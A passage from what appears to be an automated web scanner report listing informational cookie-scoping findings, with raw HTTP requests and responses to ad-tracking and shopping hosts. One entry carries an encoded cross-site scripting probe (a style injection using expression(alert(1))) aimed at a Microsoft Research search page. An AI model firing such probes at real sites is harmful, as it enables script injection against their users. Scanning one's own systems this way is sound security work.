The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=41&id=23 HTTP/1.1
Host: am.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4fae74084-d4c4-4986-af20-d7ce71839597-gs1x0mwv; T_k5bs=ndp%3Ay5%3A1; rth=2-lqupie-ndp~y5~1~1-exv~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sat, 03 Sep 2011 21:33:57 GMT
Connection: close
Set-Cookie: T_k5bs=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8t18=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3dqj=44%3A4528%3A1; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:33:58 GMT; Path=/
Set-Cookie: rth=2-lqupie-44~4528~1~1-ndp~y5~1~1-exv~0~1~1-; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:33:58 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.18. http://api.flickr.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.flickr.com
Path:   /clientaccesspolicy.xml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clientaccesspolicy.xml HTTP/1.1
Host: api.flickr.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 03 Sep 2011 13:08:20 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sat, 31-Aug-2013 13:08:20 GMT; path=/; domain=.flickr.com
Cache-Control: private
X-Served-By: www169.flickr.mud.yahoo.com
Vary: Accept-Encoding
Content-Length: 2211
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Flickr API: Page not found</title>
   <link href="http://l.yimg.com/g/css/c_flickr.css.v106445.18" rel="styleshe
...[SNIP]...

10.19. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035669&c3=&c4=http%3A%2F%2Fmeetupblog.meetup.com%2F&c5=&c6=&c15=&ns__t=1315055589073&ns_c=UTF-8&c8=The%20Official%20Meetup%20HQ%20Blog&c7=http%3A%2F%2Fmeetupblog.meetup.com%2F&c9=http%3A%2F%2Fwww.meetup.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 03 Sep 2011 13:12:30 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 02-Sep-2013 13:12:30 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.20. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3000001&d.c=gif&d.o=msnportalbetarmc&d.x=76374269&d.t=page&d.u=http%3A%2F%2Fresearch.microsoft.com%2Fapps%2Fdp%2Fsearch.aspx%3Fq%3D27b6a%2522style%25253d%2522x%2B%25253aexpression%2528alert%25281%2529%2529%2B%2522d048afd9275%26x%3D0%26y%3D0%23p%3D1%26ps%3D36%26so%3D1%26sb%3Dd%26fr%3D%26to%3D%26fd%3D%26td%3D%26rt%3D%26f%3D%26a%3D%26pn%3D27b6a%2522style%25253d%2522x%2B%25253aexpression%2528alert%25281%2529%2529%2B%2522d048afd9275%26pa&d.r=http%3A%2F%2Fresearch.microsoft.com%2Fen-us%2Fdefault.aspx HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/apps/dp/search.aspx?q=27b6a%22style%253d%22x+%253aexpression%28alert%281%29%29+%22d048afd9275&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 03 Sep 2011 12:56:28 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 02-Sep-2013 12:56:28 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

10.21. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=749&token=DOTM5 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Tue, 28-Aug-2012 21:33:49 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A749%3B09%2F17%2F2011%3BDOTM5; Domain=.contextweb.com; Expires=Sun, 07-Aug-2016 21:33:49 GMT; Path=/
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:33:49 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

10.22. http://c7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=305&g=20&a=149&s=1&t=r HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: FFAbh=977B305,20|149_1#365:826,20|121_977#365;expires=Fri, 02 Dec 2011 21:40:29 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFBbh=977B305,20|149_1#0:826,20|121_977#0;expires=Sun, 02 Sep 2012 21:40:29 GMT;domain=.zedo.com;path=/;
ETag: "91967049-de5c-4a8e112997f00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=29883
Expires: Sun, 04 Sep 2011 05:58:32 GMT
Date: Sat, 03 Sep 2011 21:40:29 GMT
Connection: close

GIF89a.............!.......,...........D..;



10.23. https://cart.godaddy.com/basket.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cart.godaddy.com
Path:   /basket.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /basket.aspx?app%5Fhdr= HTTP/1.1
Host: cart.godaddy.com
Connection: keep-alive
Referer: http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; domainYardVal=%2D1; serverVersion=A

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:48:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currency1=potableSourceStr=USD311ef78c60812ba60cb9d86e; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault&sitename=cart.godaddy.com&page=/basket.aspx&server=M1PWCARTWEB009&status=200 OK&querystring=app_hdr=&piishown=0&shopper=46215871&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=19a7e39c-dcff-40f6-8f6d-e19d0c50259d&split=24&referringdomain=; domain=godaddy.com; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 405795


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">

...[SNIP]...

10.24. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=2&gen=1000&gen=100&sid=4e6264ca66bc96d7&callback=_ate.ad.hrr&pub=xa-4c99effd765dd67e&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fpress_room%2Fnews_archive%2F2011%2Fnews_diginotar_reports_security_incident.aspx&ref=http%3A%2F%2Fvasco.com%2F&1lovjpa HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; di=%7B%7D..1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; psc=4; uid=4e5e3f1ae3fd7427; uvc=17|35; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Sat, 03 Sep 2011 17:32:22 GMT
Set-Cookie: di=1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:22 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03-Oct-2011 17:32:22 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Sat, 03 Sep 2011 17:32:21 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"OTUxMDFOQVVTQ0EyMTczMDU4MDgwNzc0MDAwVg=="});

10.25. http://cf.addthis.com/red/usync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/usync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/usync?pid=6&puid=6422714091563403120 HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; uid=4e5e3f1ae3fd7427; uvc=22|35; psc=0; dt=X; di=%7B%7D..1315071141.10R|1315071225.1WV|1315071141.1FE|1314983342.1OD|1315071141.60|1315071141.1EY

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: di=%7B%226%22%3A%226422714091563403120%22%7D..1315071277.1WV|1315071141.10R|1315071141.1FE|1315071141.60|1315071141.1EY|1314983342.1OD; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:34:55 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Content-Type: image/png
Content-Length: 67
Date: Sat, 03 Sep 2011 17:34:55 GMT
Connection: close

.PNG
.
...IHDR.............:~.U...
IDATx.c`......H..q....IEND.B`.

10.26. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4e5e3f1ae3fd7427&curl=http%3a%2f%2fvasco.com%2fcompany%2fpress_room%2fnews_archive%2f2011%2fnews_diginotar_reports_security_incident.aspx HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lqt1dm0zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=016020a0e0f0g0h1lqt1dmxzt137enxzt137enxzt10xzt137enxzt10; orblb=2lqupib012fd10u0100000; vstcnt=41bb010r053d7x118e10124zbs2150v10024fj9y118e10024t1es127p1012455ue118e1022; clid=2lqt1dm01170vf1kj11kp2en03m9g00b6t05100b906; sglst=41bb00v00t044m9v00arr9v00dnh9u303td9v00arp9u30f7u9u307219v000kn9v00a6p9v005m39v005m29u305no9u30dsb9v00cnw9v00esh9v00cnu9u30gol9u30esg9u30ctn9u308nc9v00ebb9v00ctp9v00cro9v004qk9u30h9v9u30dzq9u30bow9u304wb9v00dzt9v000xz0108dy9v0; rdrlst=41a0sh6lqupib000000066t051d6blqupib000000066t051byalqtqj1000000096t05120zlqupib000000066t0513kulqupib000000066t0516pilqwj0f000000026t020x18lqupib000000066t0518k8lqupib000000066t0516pelqtqj1000000096t0518ldlqwnn2000000016t0118lclqupib000000066t0518erlqtqj1000000096t05163mlqupib000000066t0518etlqwj0f000000026t0209pglqupib000000066t051679lqupib000000066t050dhvlqupib000000066t050dhxlqwj0f000000026t0218lplqupib000000066t0514kelqtqj1000000096t0518lqlqwj06000000036t0314khlqwj0f000000026t0214hnlqwj0f000000026t020lw4lqwj0f000000026t0218l0lqtqsb000000076t050lm0lqupib000000066t0517fllqupib000000066t0517gxlqtqj1000000096t0518kzlqwj02000000046t040lm4lqupib000000066t050llslqupib000000066t050zpelqwj0f000000026t020zpclqtqj1000000096t0519ezlqtqj1000000096t0518knlqw8s9000000056t0506pblqupib000000066t0518kmlqtqjn000000086t050afolqupib000000066t0507sylqupib000000066t050kkjlqupib000000066t050drhlqupib000000066t0514bxlqwj0f000000026t0214bulqtqj1000000096t051cyqlqtqj1000000096t050huxlqtqj1000000096t0516d5lqwj0f000000026t02

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: orblb=2lqupib012fd10u0100000; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: vstcnt=41bb010r063d7x118e10124zbs2150v10024fj9y118e10024t1es127p10124uzg6118e1032455ue118e1022; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: clid=2lqt1dm01170vf1kj11kp2en05i0c00d6u02100d908; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: sglst=41bb00v00t044m9w00arr9w00dnh9u303td9w00arp9u30f7u9u307219w000kn9w00a6p9w005m39w005m29u305no9u30dsb9w00cnw9w00esh9w00cnu9u30gol9u30esg9u30ctn9u308nc9w00ebb9w00ctp9w00cro9w004qk9u30h9v9u30dzq9u30bow9u304wb9w00dzt9w001bi030ag29w008dy9w000td9w0; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: rdrlst=41c0sh6lqupib000000086u021d6blqupib000000086u021byalqtqj10000000b6u02120zlqupib000000086u0213kulqupib000000086u0216pilqwj0f000000046u020x18lqupib000000086u0218k8lqupib000000086u0216pelqtqj10000000b6u0218ldlqwnn2000000036u0218lclqupib000000086u0218erlqtqj10000000b6u02163mlqupib000000086u0218etlqwj0f000000046u0209pglqupib000000086u021679lqupib000000086u020dhvlqupib000000086u020dhxlqwj0f000000046u0218lplqupib000000086u0214kelqtqj10000000b6u0218lqlqwj06000000056u0214khlqwj0f000000046u0214hnlqwj0f000000046u0218l0lqtqsb000000096u020lm0lqupib000000086u020lw4lqwj0f000000046u0217fllqupib000000086u0217gxlqtqj10000000b6u0218kzlqwj02000000066u020lm4lqupib000000086u020llslqupib000000086u020zpelqwj0f000000046u021192lqyjdy000000026u020zpclqtqj10000000b6u0219ezlqtqj10000000b6u0218knlqw8s9000000076u0206pblqupib000000086u0218kmlqtqjn0000000a6u020afolqupib000000086u0207sylqupib000000086u020kkjlqupib000000086u020drhlqupib000000086u0210telqyjdy000000016u0114bxlqwj0f000000046u0214bulqtqj10000000b6u021cyqlqtqj10000000b6u020huxlqtqj10000000b6u0216d5lqwj0f000000046u02; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Location: http://cm.g.doubleclick.net/pixel?nid=media6degrees
Content-Length: 0
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close


10.27. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=121&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 90
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Fri, 02 Dec 2011 21:40:25 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=977B826,20|121_977#0;expires=Sun, 02 Sep 2012 21:40:25 GMT;domain=.zedo.com;path=/;
ETag: "3a9d58c-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=24701
Expires: Sun, 04 Sep 2011 04:32:06 GMT
Date: Sat, 03 Sep 2011 21:40:25 GMT
Connection: close

GIF89a.............!.......,...........D..;


GIF89a.............!.......,...........D..;

10.28. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=809&g=20&a=3&s=1&t=i HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=SEO000000000W&dtmc_ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&dtmc_loc=http%3A//www.register.com/
Cookie: FFgeo=5386156; ZFFBbh=955B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|633_962#381Z695_955#374Z332_950#369; FFAbh=950B809,20|10_1#365:305,20|458_1#371Z145_2#371; FFBbh=962B305,20|145_2#3Z458_1#0:809,20|10_1#0; ZEDOIDX=5

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: FFAbh=950B809,20|3_2#392Z10_1#365:305,20|458_1#371Z145_2#371;expires=Fri, 02 Dec 2011 21:56:38 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFBbh=962B809,20|3_2#30Z10_1#0:305,20|145_2#3Z458_1#0;expires=Sun, 02 Sep 2012 21:56:38 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=14707
Expires: Sun, 04 Sep 2011 02:01:45 GMT
Date: Sat, 03 Sep 2011 21:56:38 GMT
Connection: close

GIF89a.............!.......,...........D..;



10.29. http://ds.addthis.com/red/psi/sites/vasco.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/vasco.com/p.json

Issue detail

